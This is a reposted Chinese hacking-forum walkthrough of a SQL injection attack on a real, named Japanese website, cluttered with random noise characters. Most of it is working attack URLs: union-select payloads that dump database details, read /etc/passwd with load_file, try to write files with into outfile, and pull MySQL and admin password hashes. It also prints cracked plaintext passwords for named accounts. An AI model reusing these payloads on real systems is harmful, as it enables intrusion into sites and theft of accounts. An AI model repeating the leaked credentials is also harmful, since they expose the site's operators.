|
|
, u/ |2 F# D. G1 o6 C. w
5 d2 z6 N, `, |: q. E7 Y0x01. 检测 www.zuaa.jp 收集数据0 j% d: `3 ?! z& W4 a- g3 ~$ ?6 u. T
+ Y1 c, Y1 Q+ g6 V
$ r5 G' y Y9 Y$ z: Q6 pwhatweb
1 O8 d! f9 k- p: B# |3 M7 Q: F8 n) c2 z7 `1 E
! I. ]$ V# ^7 ^: ]" q o' [利用NMAP扫描9 T. B1 ^! ^ w
: I, k# _2 a% g% k# X7 ^8 e中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
; ?" ?- G! N1 u ~6 o0x02.找注入点: W4 Q- u: t3 }8 e& R0 J+ e3 {- E
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
: O3 Z4 g5 o, C" ]7 T: h4 q7 h, t6 s4 H" \4 h* n9 x
$ b d; j! b# l0x03.order by
+ p1 Z. ?, B0 W http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 12 k1 [3 z9 F- ~. }( x3 |. {
. e# `2 P# S/ d
order by 28报错,order by 27正常
8 m6 @$ t* P8 j+ j9 k& l5 M! k( x/ B' O% j. j
0x04. union手动查询
1 a2 V0 F; Z( z0 k4 c" F6 Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 6 f4 w L5 B" _6 _ F
添加到 27 时正常显示
0 P6 [4 k: Y( S$ U3 R
5 L$ i2 Q9 x# E, u中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持1 g( w7 P/ D' g# D) g
; u: `4 r; c2 n; |
0x05. info:. z0 R7 B1 s3 Y8 T% l
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ! R# I4 g1 B- v
/ o- i, h& K* B+ P
user: root@localhost4 W, F9 e( t# {7 M6 V
database: openpne
8 ~9 I8 G8 }0 K. hversion: 4.1.225 a- w1 a5 T2 r- l4 l, L. S/ \* t& q
os: portbld-freebsd5.4
B R6 g. j: n+ I# Z7 t& i. K0 h9 W+ s0 }1 z6 N
0x06. root用户& W1 d9 W+ n9 g7 Q* ~
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
9 g$ f' l8 H8 G' yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
; C& h; I& @$ z P7 g) B" |3 l, y7 m& N, G0 C% _6 Z+ { B
通过工具转换
* w3 w/ V. J% S3 Q$ g0 ?
: A8 h! W: y3 B中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
( U3 A5 h6 J, l( Y' Y% e
$ ~) c) x# E# ~$ Z/ j0x07. 利用 into outfile5 Z6 K% x0 {" Q, Y0 U' z3 D0 e
全部都失败
% j( G; B: A' rhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php/ }% v Z4 I' Y. |9 j
- G! U5 v# x) ~. K9 chttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
/ V1 |" v# N+ ^5 Q- o9 V ~& `/ O( J) Z# L
页面显示“MDB2 Error:syntax error”
# _5 X$ G! z* ]( {$ {2 M4 ?6 E$ |% V) _# ~+ L
0x08. 利用 mysql 4.12 v0 F# F1 Z& L6 y- b: e
猜常规表名,字段未果 工具 sqlmap# }0 P* m J# z3 X7 @& K
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持+ W, J) `' }4 z8 `$ q5 _
/ q, a @% c# k/ B y8 |; n
% Y4 A o; }3 F! Z
( U/ p: K- g, R& L' H0x09. 查找后台
+ m; Q( f2 E2 v* B9 P2 \利用 现有的各种 后台工具尝试都不行
. S9 i& r1 g; y) W/ Y; P8 Z
) E+ M3 i1 S# v& |7 p0x10. MySL外联方法
* i P( D# E0 X3 I3 g. o从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
8 [# c# ]- h, v5 o: E可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
7 k% A5 T7 Z. |8 W7 H# t% ~# dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user" M+ U7 J" f% A# J. E5 S
7 \2 l y9 @1 Z7 c+ a) M
这个可以在 www.cmd5.com 解密5 q# E# T' _1 I! }/ v- r( `" I: \
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009: y! S- |$ T2 q% D# S. ]& A8 `7 K3 H
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
0 b8 V, ?5 }: l4 a4 W& J; U6 N" copenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
) t4 F4 E4 u' w! v! o3 W' lzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???; M. D K8 r [" j8 e( F
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
C7 q% q, |& J3 t; S. q4 I3 ?2 M2 [0 @* u2 ^2 r% a
# L9 O8 K8 T5 t8 a0x11. 网站突破- k3 y# N( m& i7 M% ^
发现网站的源程序 openpne, google 下载 openpne 源码# N' X. x# ~( A* ^# k
B8 C3 `$ R9 E* i9 o0 y% x% U1 O# O$ {
0x12. 默认信息利用+ Y5 m) ?+ ^. `
http://sns.zuaa.jp/?m=admin&a=page_login
0 I+ r0 ?) R/ C6 |( a7 c
, W1 b8 O5 t- m表名 (c_admin_user) ,字段名(username,password)
5 u6 N% t* q" j% I. {/ a* A# J3 f- uhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user/ ]# d+ W) B2 d$ ^0 b; v
. x+ ~ b6 @0 F& W" r解密( F% Z' z2 r& c1 t
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa20099 T- B9 E' y+ j2 A1 |' Q
zuaajp:c0923ec5857796a393da99905008c176, zju1897
7 Q" K5 A1 u; {6 _ ]6 C
/ k2 k0 b2 O4 ?8 z8 W1 ?中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
: \5 @- E7 y" S1 f
6 D6 P: o% {7 O1 i0x13. 登录后台
0 L K- ~1 c* ^2 X6 F* R+ z
+ C4 L; F: k8 q" W0 u2 U9 a# G0 m: Y/ |6 T2 N0 W8 @! d
0 j3 `( J* R& P8 j& u Z
0x14. 小结
`2 x- w! u& E; K利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
) c: X- Q$ r6 E& l+ R. k ]$ w感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点3 t0 ?$ h3 q" x5 m1 F( X
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
" L% a8 z% o7 ?# ^4 G1 \, S- i中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持: Y. ]- y [2 |( V2 n! W# }
; h) W0 o) C* \5 t; v最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
9 `% R. q. f" Q3 T1 v0 y$ U |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|